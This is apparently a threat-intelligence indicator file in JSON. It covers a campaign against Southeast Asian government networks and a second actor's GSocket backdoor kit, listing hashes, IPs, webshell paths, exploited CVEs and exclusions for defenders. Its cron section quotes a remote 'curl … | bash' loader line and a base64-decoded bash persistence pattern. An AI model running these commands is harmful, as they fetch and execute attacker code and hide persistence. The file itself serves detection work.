{
  "metadata": {
    "malware_name": "SE-Asia Government Exploitation Toolkit",
    "family": "Operator exploitation/staging toolkit (unattributed) + co-located GSocket second-actor implants",
    "campaign_id": "seasia-gov-exploitation-toolkit-144-172-106-236",
    "report_date": "2026-07-17",
    "analyst": "The Hunters Ledger",
    "confidence": "HIGH",
    "tlp": "CLEAR",
    "actor": "UNATTRIBUTED",
    "notes": "Two distinct actor sets are represented and MUST be kept separate. (1) The reported operator: a single hands-on-keyboard operator running a four-country (ID/TH/MY/PH) government-targeting campaign from 144.172.106.236. (2) A co-located, MODERATE-likely SEPARATE second intruder whose GSocket/THC backdoor kit (localroot.sbs / cat.sh + /home/nast/* implants) was found on the shared victim svr1.nast.ph. Second-actor indicators are flagged 'second_actor': true and must not be folded into the operator's TTP set. Commodity chisel.exe hash is shared by 179 VT submitters, HUNT only, not an attribution or block anchor; its VT relationships are shared-tool noise. See stage1-malware-analyst.md Section 7.4 for the full hard-exclusion list enforced here."
  },
  "file_hashes": {
    "sha256": [
      {
        "value": "e788f829b1a0141a488afb5f82b94f13035623609ca3b83f0c6985919cd9e83b",
        "filename": "chisel.exe",
        "type": "PE32+ Go executable",
        "confidence": "LOW",
        "action": "HUNT",
        "false_positive_risk": true,
        "context": "Commodity Chisel tunnel (VT 55/71, Hacktool.Chisel). Shared by 179 VT submitters/166 sources since 2024-10-07, worthless for attribution and MUST NOT be blocked or used as an operator anchor. Its VT contacted_ips/itw_ips/similar_files are shared-tool noise. Present in the operator toolkit; hunt only. Also trips PoetRat_Python/android_meterpreter YARA = known false positives."
      },
      {
        "value": "23560e13d06d8153e0e7566d153ffe9eec79e08eb1ed18f8cd1417728e7dbdd6",
        "filename": "tunnel-server",
        "type": "ELF64 Go executable",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator's self-built multi-agent reverse-tunnel + SOCKS5 server (module tunnel-proxy/pkg/mux). Listens :9443 control + :1080 SOCKS5, no-auth, no-TLS. Never carried victim traffic in 14 days of logs. Trips PoetRat_Python/android_meterpreter YARA = false positives."
      },
      {
        "value": "c600f8e4ee5ece27ce777fe4f69c18c6611768ee7192c74e4e66f9e236e19b1e",
        "filename": "tunnel-agent",
        "type": "ELF64 Go executable",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator's paired tunnel agent, same Go module family (tunnel-proxy/pkg/mux). Trips PoetRat_Python/android_meterpreter YARA = false positives."
      },
      {
        "value": "8a7d387663d7f32730ed8b996f1dab7c2eed4b829b71fd48c608f51569dc4d69",
        "filename": "cat.sh",
        "type": "Shell script (GSocket/THC backdoor loader)",
        "confidence": "HIGH",
        "action": "BLOCK",
        "second_actor": true,
        "context": "SECOND-ACTOR (probably-separate intruder on svr1.nast.ph). VT 19/61 (Symantec Trojan.Gen.NPE, Kaspersky HEUR:Trojan.Shell.Agent.ce), Zenbox Linux MALWARE/EVADER, tags self-delete + detect-debug-environment. GSocket/THC backdoor kit served by localroot.sbs. VT-confirmed 2026-07-17: embeds gsocket.io + gs.thc.org relay + Telegram/Discord/webhook.site + 87.106.101.131. Safe to block/alert."
      }
    ],
    "md5": [
      {
        "value": "f26c3cd4209492b699131d29b76d941a",
        "filename": "chisel.exe",
        "action": "HUNT",
        "false_positive_risk": true
      },
      {
        "value": "d96d4e7bc25704e48576ee7667d424aa",
        "filename": "tunnel-server",
        "action": "HUNT"
      },
      {
        "value": "157ff784cd1736f401e54cd2aa3cde38",
        "filename": "tunnel-agent",
        "action": "HUNT"
      },
      {
        "value": "0d72d798449356ed66410f7e84c4a37a",
        "filename": "cat.sh",
        "action": "BLOCK",
        "second_actor": true
      }
    ],
    "sha1": [
      {
        "value": "c787636df481e1075db49c96d696de8dc6198e26",
        "filename": "chisel.exe",
        "action": "HUNT",
        "false_positive_risk": true
      },
      {
        "value": "c640fed8c76802f2bea562ff08a0643d8f033771",
        "filename": "tunnel-server",
        "action": "HUNT"
      },
      {
        "value": "886504ea793ae05bb8206f383a3140e8d7bddd45",
        "filename": "tunnel-agent",
        "action": "HUNT"
      },
      {
        "value": "71760ce87e12cb881c2316034be0d016617f7628",
        "filename": "cat.sh",
        "action": "BLOCK",
        "second_actor": true
      }
    ]
  },
  "network_indicators": {
    "ipv4": [
      {
        "value": "144.172.106.236",
        "port": 9999,
        "protocol": "TCP",
        "purpose": "Operator VPS / open-directory origin",
        "confidence": "DEFINITE",
        "action": "MONITOR",
        "notes": "AS14956 RouterHosting LLC / Cloudzy (US), block 144.172.96.0/20. Single dedicated operator box (only identified dedicated asset). Operator listener map: :9443 tunnel control, :1080 SOCKS5 no-auth, :8443/:4443 chisel, :8080 SSRF canary, :4444/:80/:443 ncat, :9999 open dir. SSH live through 2026-07-14; :9999 open dir pulled early July 2026."
      }
    ],
    "ipv6": [],
    "domains": [],
    "urls": [],
    "email_addresses": [
      {
        "value": "security-monitor@tni.mil.id",
        "purpose": "Spoofed phishing sender (Lemhannas / TNI pretext)",
        "confidence": "HIGH",
        "action": "MONITOR",
        "notes": "Operator-spoofed Indonesian Armed Forces sender used in deliver.py Zimbra malware-delivery and the phish_server.py 'Zimbra Security Update' lure. Detect as a spoofed-sender indicator, not as an attacker mailbox."
      }
    ],
    "user_agents": []
  },
  "hunt_only_never_block": [
    {
      "note": "Shared public infrastructure with vast legitimate use. Presence of a GSocket relay connection FROM a server-class host with no interactive user is the signal. The domains themselves are not. NEVER place these on a block list or ship as campaign IOCs. Second-actor (GSocket/THC kit) context only.",
      "relay_pool_note": "The GSRN relay hosts listed below are illustrative, not exhaustive. GSRN publishes under two naming schemes: the GSocket client queries <letter>.gs.thc.org across the full a-z range (hostname id = sum of GS-address bytes mod 26), and a second pool is published directly as gs1.thc.org through gs18.thc.org plus named hosts such as gs-abalister.thc.org. Treat ANY thc.org host whose label begins with 'gs' as relay infrastructure and never block it.",
      "domains": [
        "gsocket.io",
        "cdn.gsocket.io",
        "g.gs.thc.org",
        "p.gs.thc.org",
        "z.gs.thc.org",
        "master.gs.thc.org",
        "api.telegram.org",
        "discord.com",
        "webhook.site",
        "raw.githubusercontent.com",
        "github.com"
      ]
    },
    {
      "value": "serveo.net",
      "category": "tunnelling service"
    },
    {
      "value": "localroot.sbs",
      "category": "author-marked never-block",
      "context": "Second-actor loader / staging domain"
    },
    {
      "value": "utah01-maas.cloudzy.com",
      "category": "author-marked never-block",
      "context": "Resolves to 144.172.106.236 itself (288 self-lookups in the operator's localhost DNS log). Cloudzy provider infrastructure hostname, not a C2 domain, context/hunt only, do not block."
    },
    {
      "value": "87.106.101.131",
      "category": "author-marked never-block",
      "context": "GSRN public relay node (gs18.thc.org), seen embedded in the second-actor cat.sh loader"
    }
  ],
  "host_indicators": {
    "file_paths": [
      {
        "value": "/home/nast/netd",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph, invoked from cron via base64 indirection"
      },
      {
        "value": "/home/nast/authd",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph"
      },
      {
        "value": "/home/nast/bootcfg",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph"
      },
      {
        "value": "/home/nast/udevd-sync",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor daemon-masquerade implant on svr1.nast.ph. Generalize: executables in a user home directory bearing system-daemon names never belong there."
      },
      {
        "value": "/opt/zimbra/jetty/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (Lemhannas). Delivery attempted, success unconfirmed, hunt to determine if it landed."
      },
      {
        "value": "/opt/zimbra/jetty/webapps/zimbra/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/jetty_base/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/jetty_base/webapps/zimbra/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/mailboxd/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/mailboxd/webapps/zimbra/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7)"
      },
      {
        "value": "/opt/zimbra/jetty-distribution-9.4.46.v20220331/webapps/zimbra/public/shell.jsp",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator Zimbra CVE-2022-41352 webshell drop path (1 of 7). jetty-distribution version = the Zimbra build the operator expected."
      },
      {
        "value": "/tmp/proxylogon-loop",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging dir for the failed Exchange ProxyLogon SSRF loop"
      },
      {
        "value": "/tmp/sipede_docs/",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging dir for exfiltrated Kejaksaan correspondence PDFs"
      },
      {
        "value": "/tmp/vpn_cookies.txt",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging for harvested Ivanti DSID VPN session cookies"
      },
      {
        "value": "/tmp/creds_result.txt",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator credential-validation output (recorded MHESI authenticated access)"
      },
      {
        "value": "/tmp/exploit.cpio",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator staging for the Zimbra CVE-2022-41352 7-path cpio weapon"
      }
    ],
    "cron_patterns": [
      {
        "value": "curl https://localroot.sbs/cat.sh | bash",
        "confidence": "DEFINITE",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor remote loader cron entry on svr1.nast.ph"
      },
      {
        "value": "{ echo <base64> | base64 -d | bash;} 2>/dev/null >/dev/null",
        "confidence": "HIGH",
        "action": "HUNT",
        "second_actor": true,
        "context": "Second-actor generic cron pattern: base64-indirected execution with both streams suppressed. Durable behavioral anchor (Robustness >= 2), better than the literal implant paths. Base64->plaintext: Jy9ob21lL25hc3QvbmV0ZCcK=/home/nast/netd, Jy9ob21lL25hc3QvYXV0aGQnCg===/home/nast/authd, Jy9ob21lL25hc3QvYm9vdGNmZycK=/home/nast/bootcfg, Jy9ob21lL25hc3QvdWRldmQtc3luYycK=/home/nast/udevd-sync"
      }
    ],
    "ssh_host_key_fingerprints": [
      {
        "value": "ED25519:84FDB939...23B7",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator SSH host key on 144.172.106.236 (banner OpenSSH_9.6p1 Ubuntu-3ubuntu13.16). Unique to this IP (no sibling reuse in Hunt.io corpus). Full fingerprint in vault working notes; flag reuse on sibling hosts."
      },
      {
        "value": "RSA:55F5EE6E...52FA",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator SSH host key on 144.172.106.236"
      },
      {
        "value": "ECDSA:B78E7D40...7D1F",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator SSH host key on 144.172.106.236"
      }
    ],
    "ssh_authorized_key_fingerprints": [
      {
        "value": "SHA256:b2sH9INFA/+b9jwMiiTmJoNFaC6SuKI3zc+SDgsBGCE",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator injection pubkey (redis_key.pub, comment root@ubuntu-Utah-1gb, RSA-3072). Hunt authorized_keys on ANY host, especially root; presence = operator backdoor SSH access."
      },
      {
        "value": "SHA256:YxKzdruIAqko5v19o1I9P98ie7XA1WdNwpAG+TjAA0o",
        "confidence": "MODERATE",
        "action": "HUNT",
        "context": "id_rsa_nast private key fingerprint. ASSESSED (not proven) to be the operator's NAST access key."
      }
    ],
    "tls_key_fingerprints": [
      {
        "value": "yW2X8fCVTmfMSpVyrhZQGkSTCfBJBMSyQtgPzCMCfuw=",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "chisel SERVER key fingerprint on :8443 (chisel.log). Operator-generated, survives IP changes, durable attribution anchor (unlike the commodity chisel.exe hash). Flag reuse anywhere."
      },
      {
        "value": "rEVojNCdmii9193KJQL0CQdIcudwm3RW32BKJlUgLT4=",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "chisel SERVER key fingerprint on :4443 (reverse tunnelling, chisel-reverse.log). Second distinct operator-generated key."
      }
    ],
    "content_strings": [
      {
        "value": "Zimbra Security Monitor v3.1 -- System Diagnostics",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator-authored JSP webshell decoy banner, embedded in every exploit.cpio member. Zero legitimate use. The single best hunting string in the case. Also ties the webshell to the phish lure branding and spoofed security-monitor@tni.mil.id sender."
      },
      {
        "value": "tunnel-proxy/pkg/mux",
        "confidence": "HIGH",
        "action": "HUNT",
        "context": "Operator custom Go tunnel module path, embedded in both ELF64 tunnel binaries."
      }
    ],
    "mutex_names": [],
    "service_names": [],
    "scheduled_tasks": [],
    "named_pipes": []
  },
  "cves_confirmed_in_code": [
    {
      "id": "CVE-2023-46805",
      "product": "Ivanti Connect Secure",
      "note": "Auth-bypass path traversal, chained with CVE-2024-21887 against vpn.mhesi.go.th"
    },
    {
      "id": "CVE-2024-21887",
      "product": "Ivanti Connect Secure",
      "note": "Command injection"
    },
    {
      "id": "CVE-2024-28149",
      "product": "Tableau Server",
      "note": "File read; rbportal/Kong token request FAILED (invalid_grant)"
    },
    {
      "id": "CVE-2024-51758",
      "product": "Tableau Server",
      "note": "SAML bypass"
    },
    {
      "id": "CVE-2022-41352",
      "product": "Zimbra (Amavis cpio)",
      "note": "7-path cpio webshell weapon vs mailweb.lemhannas.go.id; delivery attempted, success unconfirmed"
    },
    {
      "id": "CVE-2020-25627",
      "product": "Moodle",
      "note": "XSS; referenced in code, no exploitation evidenced"
    },
    {
      "id": "CVE-2020-25629",
      "product": "Moodle",
      "note": "PrivEsc; referenced in code, no exploitation evidenced"
    },
    {
      "id": "CVE-2020-25630",
      "product": "Moodle",
      "note": "Unauth LFI; referenced in code, no exploitation evidenced"
    },
    {
      "id": "CVE-2021-26855",
      "product": "Microsoft Exchange (ProxyLogon)",
      "note": "Confirmed by SSRF technique in exploit_loop.sh; ATTEMPT FAILED against RTAF/RTARF (411/400/404/401)"
    }
  ],
  "excluded_indicators": {
    "note": "Recorded so downstream stages do not re-add them. Each is shared public infrastructure, a provider artifact, victim-side data, or scanner noise, NOT operator or target infrastructure. Do not place in any block rule or CERT material.",
    "items": [
      {
        "value": "c739f55d53b632bddc229a332a5165d006ae14cdabe6740a9048619394ac3b93",
        "reason": "VPNJantit's PUBLIC VPN-node certificate would flag every VPNJantit user worldwide (Censys returns 1 host)"
      },
      {
        "value": "128.199.246.46",
        "reason": "Public VPNJantit free-VPN exit node the operator connected THROUGH (usable only as a source IP, never operator-owned)"
      },
      {
        "value": "146.56.180.42",
        "reason": "Shared Hysteria2 circumvention proxy the operator used upstream (not operator-owned)"
      },
      {
        "value": "43.208.251.115",
        "reason": "AWS-Thailand SOCKS5 'Thai VPS' candidate, ownership INSUFFICIENT; operator could not even connect"
      },
      {
        "value": "119.59.99.87",
        "reason": "Confirmed VICTIM host (Thai WordPress), not operator infrastructure, victim-notification context only"
      },
      {
        "value": "103.146.204.15",
        "reason": "RTA SSH brute TARGET (failed), not operator infrastructure"
      },
      {
        "value": "bootyreader.com",
        "reason": "Unrelated Moroccan spam co-tenant of the recycled IP"
      },
      {
        "value": "140.99.255.48",
        "reason": "bootyreader.com's host"
      },
      {
        "value": "bsre.bssn.go.id / bsre.go.id / va.bsre.go.id / crl.rootca.id",
        "reason": "BSSN's own e-signature CA / Indonesian root CA, appears only as stolen-PDF signature metadata; NOT targets"
      },
      {
        "value": "mahkamahagung.go.id (+ www/jdih/putusan)",
        "reason": "Navigation links inside a captured victim page, Supreme Court NOT targeted"
      },
      {
        "value": "esr.menpan.go.id / sicana.kejaksaan.go.id",
        "reason": "Referenced only in exfiltrated letter bodies"
      },
      {
        "value": "ulm.ac.id",
        "reason": "Email domain of a harvested credential, not a host"
      },
      {
        "value": "3.87.27.156 / 167.94.146.54 (Censys) / Linode 66.132.x / 45.33.12.214 / 50.116.26.161 / 172.104.210.105 / 194.195.210.47 / 69.164.217.74 / 194.164.107.4",
        "reason": "Internet scanner sources in the operator's logs, NOT operator, NOT victim"
      },
      {
        "value": "windows-Utah-* / ubuntu-Utah-* cert CNs",
        "reason": "2,634 hosts across many ASNs incl. AWS, dead attribution signal"
      },
      {
        "value": "CVE-2026-68645",
        "reason": "FABRICATED, appears only as the fake 'security patch' string in the phish_server.py lure, not a real exploited vulnerability"
      },
      {
        "value": "ysoserial gadget-chain rules / PoetRat_Python / android_meterpreter YARA",
        "reason": "No ysoserial in capture (file 'jar' is an empty cookie jar); PoetRat/meterpreter are false positives on chisel and both Go tunnel binaries"
      }
    ]
  }
}
